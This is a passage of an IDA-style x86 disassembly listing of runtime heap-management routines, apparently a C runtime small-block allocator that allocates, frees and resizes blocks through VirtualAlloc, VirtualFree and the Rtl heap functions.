mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_4191F8
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_418FAA
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_418F38
push 3Fh
pop edx
loc_418F38: ; CODE XREF: sub_418ED4+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_418F8C
cmp edx, 20h
jnb short loc_418F63
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_418F84
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_418F84
; ---------------------------------------------------------------------------
loc_418F63: ; CODE XREF: sub_418ED4+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_418F84
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_418F84: ; CODE XREF: sub_418ED4+86�j
; sub_418ED4+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_418F8F
; ---------------------------------------------------------------------------
loc_418F8C: ; CODE XREF: sub_418ED4+6A�j
mov ecx, [ebp+var_4]
loc_418F8F: ; CODE XREF: sub_418ED4+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_418FAA: ; CODE XREF: sub_418ED4+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_418FB8
push 3Fh
pop edx
loc_418FB8: ; CODE XREF: sub_418ED4+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_41905B
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_418FDD
mov ebx, esi
loc_418FDD: ; CODE XREF: sub_418ED4+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_418FEF
mov edx, esi
loc_418FEF: ; CODE XREF: sub_418ED4+117�j
cmp ebx, edx
jz short loc_419056
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41903E
cmp ebx, 20h
jnb short loc_41901F
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41903E
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41903E
; ---------------------------------------------------------------------------
loc_41901F: ; CODE XREF: sub_418ED4+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41903E
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41903E: ; CODE XREF: sub_418ED4+128�j
; sub_418ED4+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_419056: ; CODE XREF: sub_418ED4+11D�j
mov esi, [ebp+arg_4]
jmp short loc_41905E
; ---------------------------------------------------------------------------
loc_41905B: ; CODE XREF: sub_418ED4+ED�j
mov ebx, [ebp+arg_0]
loc_41905E: ; CODE XREF: sub_418ED4+185�j
cmp [ebp+var_C], 0
jnz short loc_41906C
cmp ebx, edx
jz loc_4190ED
loc_41906C: ; CODE XREF: sub_418ED4+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_4190ED
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_4190C4
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4190B3
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_4190B3: ; CODE XREF: sub_418ED4+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_4190ED
; ---------------------------------------------------------------------------
loc_4190C4: ; CODE XREF: sub_418ED4+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4190DA
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4190DA: ; CODE XREF: sub_418ED4+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_4190ED: ; CODE XREF: sub_418ED4+192�j
; sub_418ED4+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_4191F8
mov eax, ds:dword_4CA6F4
test eax, eax
jz loc_4191EA
mov ecx, ds:dword_4CA6EC
mov esi, ds:dword_422198
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, ds:dword_4CA6EC
mov eax, ds:dword_4CA6F4
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_4CA6F4
mov ecx, ds:dword_4CA6EC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_4CA6F4
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_4CA6F4
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41917B
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_4CA6F4
loc_41917B: ; CODE XREF: sub_418ED4+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4191EA
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, ds:dword_4CA6F4
push dword ptr [eax+10h]
push 0
push ds:dword_4CA704
call ds:dword_4220C4 ; RtlFreeHeap
mov eax, ds:dword_4CA6F8
mov edx, ds:dword_4CA6FC
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_4CA6F4
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_416470
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_4CA6F8
cmp eax, ds:dword_4CA6F4
jbe short loc_4191E0
sub [ebp+arg_0], 14h
loc_4191E0: ; CODE XREF: sub_418ED4+306�j
mov eax, ds:dword_4CA6FC
mov ds:dword_4CA6F0, eax
loc_4191EA: ; CODE XREF: sub_418ED4+234�j
; sub_418ED4+2AB�j
mov eax, [ebp+arg_0]
mov ds:dword_4CA6EC, edi
mov ds:dword_4CA6F4, eax
loc_4191F8: ; CODE XREF: sub_418ED4+38�j
; sub_418ED4+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_418ED4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4191FD proc near ; CODE XREF: sub_415D6D+18�p
; sub_41756F+77�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_4CA6F8
mov edx, ds:dword_4CA6FC
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_41923D
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41924D
; ---------------------------------------------------------------------------
loc_41923D: ; CODE XREF: sub_4191FD+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_41924D: ; CODE XREF: sub_4191FD+3E�j
mov eax, ds:dword_4CA6F0
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_419274
loc_41925B: ; CODE XREF: sub_4191FD+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_419274
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_41925B
loc_419274: ; CODE XREF: sub_4191FD+5C�j
; sub_4191FD+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4192F2
mov ebx, edx
loc_41927B: ; CODE XREF: sub_4191FD+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_419297
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_419295
add ebx, 14h
jmp short loc_41927B
; ---------------------------------------------------------------------------
loc_419295: ; CODE XREF: sub_4191FD+91�j
cmp ebx, eax
loc_419297: ; CODE XREF: sub_4191FD+83�j
jnz short loc_4192F2
loc_419299: ; CODE XREF: sub_4191FD+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_4192AF
cmp dword ptr [ebx+8], 0
jnz short loc_4192AC
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_419299
; ---------------------------------------------------------------------------
loc_4192AC: ; CODE XREF: sub_4191FD+A5�j
cmp ebx, [ebp+var_4]
loc_4192AF: ; CODE XREF: sub_4191FD+9F�j
jnz short loc_4192D7
mov ebx, edx
loc_4192B3: ; CODE XREF: sub_4191FD+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_4192C7
cmp dword ptr [ebx+8], 0
jnz short loc_4192C5
add ebx, 14h
jmp short loc_4192B3
; ---------------------------------------------------------------------------
loc_4192C5: ; CODE XREF: sub_4191FD+C1�j
cmp ebx, eax
loc_4192C7: ; CODE XREF: sub_4191FD+BB�j
jnz short loc_4192D7
call sub_419506
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4192EB
loc_4192D7: ; CODE XREF: sub_4191FD:loc_4192AF�j
; sub_4191FD:loc_4192C7�j
push ebx
call sub_4195B7
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4192F2
loc_4192EB: ; CODE XREF: sub_4191FD+D8�j
xor eax, eax
jmp loc_419501
; ---------------------------------------------------------------------------
loc_4192F2: ; CODE XREF: sub_4191FD+7A�j
; sub_4191FD:loc_419297�j ...
mov ds:dword_4CA6F0, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_419319
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_419350
loc_419319: ; CODE XREF: sub_4191FD+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41934D
loc_419336: ; CODE XREF: sub_4191FD+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_419336
loc_41934D: ; CODE XREF: sub_4191FD+137�j
mov edx, [ebp+var_4]
loc_419350: ; CODE XREF: sub_4191FD+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_419379
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_419379: ; CODE XREF: sub_4191FD+16D�j
; sub_4191FD+183�j
test ecx, ecx
jl short loc_419382
shl ecx, 1
inc edi
jmp short loc_419379
; ---------------------------------------------------------------------------
loc_419382: ; CODE XREF: sub_4191FD+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_41939F
push 3Fh
pop esi
loc_41939F: ; CODE XREF: sub_4191FD+19D�j
cmp esi, edi
jz loc_4194B4
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_419410
cmp edi, 20h
jge short loc_4193DF
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41940D
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_419410
; ---------------------------------------------------------------------------
loc_4193DF: ; CODE XREF: sub_4191FD+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41940D
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_419410
; ---------------------------------------------------------------------------
loc_41940D: ; CODE XREF: sub_4191FD+1D6�j
; sub_4191FD+203�j
mov ebx, [ebp+arg_0]
loc_419410: ; CODE XREF: sub_4191FD+1B0�j
; sub_4191FD+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_4194C0
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4194B1
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_419482
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_419470
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_419470: ; CODE XREF: sub_4191FD+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_4194B1
; ---------------------------------------------------------------------------
loc_419482: ; CODE XREF: sub_4191FD+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41949B
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41949B: ; CODE XREF: sub_4191FD+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_4194B1: ; CODE XREF: sub_4191FD+24E�j
; sub_4191FD+283�j
mov ecx, [ebp+var_8]
loc_4194B4: ; CODE XREF: sub_4191FD+1A4�j
test ecx, ecx
jz short loc_4194C3
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_4194C3
; ---------------------------------------------------------------------------
loc_4194C0: ; CODE XREF: sub_4191FD+229�j
mov ecx, [ebp+var_8]
loc_4194C3: ; CODE XREF: sub_4191FD+2B9�j
; sub_4191FD+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4194F9
cmp ebx, ds:dword_4CA6F4
jnz short loc_4194F9
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_4CA6EC
jnz short loc_4194F9
and ds:dword_4CA6F4, 0
loc_4194F9: ; CODE XREF: sub_4191FD+2E0�j
; sub_4191FD+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_419501: ; CODE XREF: sub_4191FD+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4191FD endp
; =============== S U B R O U T I N E =======================================
sub_419506 proc near ; CODE XREF: sub_4191FD+CC�p
mov eax, ds:dword_4CA6F8
mov ecx, ds:dword_4CA6E8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_419549
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_4CA6FC
push edi
push ds:dword_4CA704
call ds:dword_42217C ; RtlReAllocateHeap
cmp eax, edi
jz short loc_419599
add ds:dword_4CA6E8, 10h
mov ds:dword_4CA6FC, eax
mov eax, ds:dword_4CA6F8
loc_419549: ; CODE XREF: sub_419506+11�j
mov ecx, ds:dword_4CA6FC
push 41C4h
push 8
lea eax, [eax+eax*4]
push ds:dword_4CA704
lea esi, [ecx+eax*4]
call ds:dword_4220C8 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_419599
push 4
push 2000h
push 100000h
push edi
call ds:dword_42219C ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41959D
push dword ptr [esi+10h]
push edi
push ds:dword_4CA704
call ds:dword_4220C4 ; RtlFreeHeap
loc_419599: ; CODE XREF: sub_419506+30�j
; sub_419506+67�j
xor eax, eax
jmp short loc_4195B4
; ---------------------------------------------------------------------------
loc_41959D: ; CODE XREF: sub_419506+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_4CA6F8
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_4195B4: ; CODE XREF: sub_419506+95�j
pop edi
pop esi
retn
sub_419506 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195B7 proc near ; CODE XREF: sub_4191FD+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_4195C9: ; CODE XREF: sub_4195B7+19�j
test eax, eax
jl short loc_4195D2
shl eax, 1
inc ebx
jmp short loc_4195C9
; ---------------------------------------------------------------------------
loc_4195D2: ; CODE XREF: sub_4195B7+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_4195E7: ; CODE XREF: sub_4195B7+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4195E7
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call ds:dword_42219C ; VirtualAlloc
test eax, eax
jnz short loc_41961A
or eax, 0FFFFFFFFh
jmp loc_4196AD
; ---------------------------------------------------------------------------
loc_41961A: ; CODE XREF: sub_4195B7+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_419660
lea eax, [edi+10h]
loc_419627: ; CODE XREF: sub_4195B7+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_419627
loc_419660: ; CODE XREF: sub_4195B7+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41969D
or [eax+4], edi
loc_41969D: ; CODE XREF: sub_4195B7+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_4196AD: ; CODE XREF: sub_4195B7+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_4195B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196B2 proc near ; CODE XREF: sub_41756F+6A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_419860
test bl, 1
jnz loc_419859
add ebx, ecx
cmp esi, ebx
jg loc_419859
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_419729
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_419729: ; CODE XREF: sub_4196B2+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_419779
cmp ecx, 20h
jnb short loc_419755
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_419779
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_419779
; ---------------------------------------------------------------------------
loc_419755: ; CODE XREF: sub_4196B2+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_419779
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_419779: ; CODE XREF: sub_4196B2+7D�j
; sub_4196B2+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_419847
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_4197B3
push 3Fh
pop edi
loc_4197B3: ; CODE XREF: sub_4196B2+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_419835
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_41980C
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_4197FF
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_4197FF: ; CODE XREF: sub_4196B2+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_419831
; ---------------------------------------------------------------------------
loc_41980C: ; CODE XREF: sub_4196B2+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_419822
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_419822: ; CODE XREF: sub_4196B2+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_419831: ; CODE XREF: sub_4196B2+158�j
shr edx, cl
or [eax], edx
loc_419835: ; CODE XREF: sub_4196B2+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41984A
; ---------------------------------------------------------------------------
loc_419847: ; CODE XREF: sub_4196B2+E5�j
mov edx, [ebp+arg_4]
loc_41984A: ; CODE XREF: sub_4196B2+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_4199A0
; ---------------------------------------------------------------------------
loc_419859: ; CODE XREF: sub_4196B2+52�j
; sub_4196B2+5C�j
xor eax, eax
jmp loc_4199A3
; ---------------------------------------------------------------------------
loc_419860: ; CODE XREF: sub_4196B2+49�j
jge loc_4199A0
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_41988B
push 3Fh
pop esi
loc_41988B: ; CODE XREF: sub_4196B2+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_41991A
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_4198A4
push 3Fh
pop esi
loc_4198A4: ; CODE XREF: sub_4196B2+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_4198F3
cmp esi, 20h
jnb short loc_4198CF
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_4198F0
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4198F0
; ---------------------------------------------------------------------------
loc_4198CF: ; CODE XREF: sub_4196B2+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4198F0
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4198F0: ; CODE XREF: sub_4196B2+214�j
; sub_4196B2+21B�j ...
mov ebx, [ebp+arg_4]
loc_4198F3: ; CODE XREF: sub_4196B2+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41991A
push 3Fh
pop esi
loc_41991A: ; CODE XREF: sub_4196B2+1DD�j
; sub_4196B2+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_419997
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_41996E
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_419961
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_419961: ; CODE XREF: sub_4196B2+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_419993
; ---------------------------------------------------------------------------
loc_41996E: ; CODE XREF: sub_4196B2+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_419984
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_419984: ; CODE XREF: sub_4196B2+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_419993: ; CODE XREF: sub_4196B2+2BA�j
shr edx, cl
or [eax], edx
loc_419997: ; CODE XREF: sub_4196B2+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_4199A0: ; CODE XREF: sub_4196B2+1A2�j
; sub_4196B2:loc_419860�j
push 1
pop eax
